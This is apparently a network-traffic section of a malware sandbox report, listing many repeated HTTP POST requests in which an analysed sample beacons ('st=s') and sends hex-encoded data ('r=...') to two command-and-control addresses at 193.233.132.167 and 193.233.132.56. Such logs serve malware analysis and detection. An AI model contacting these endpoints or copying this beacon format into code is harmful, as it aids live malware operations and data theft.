Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
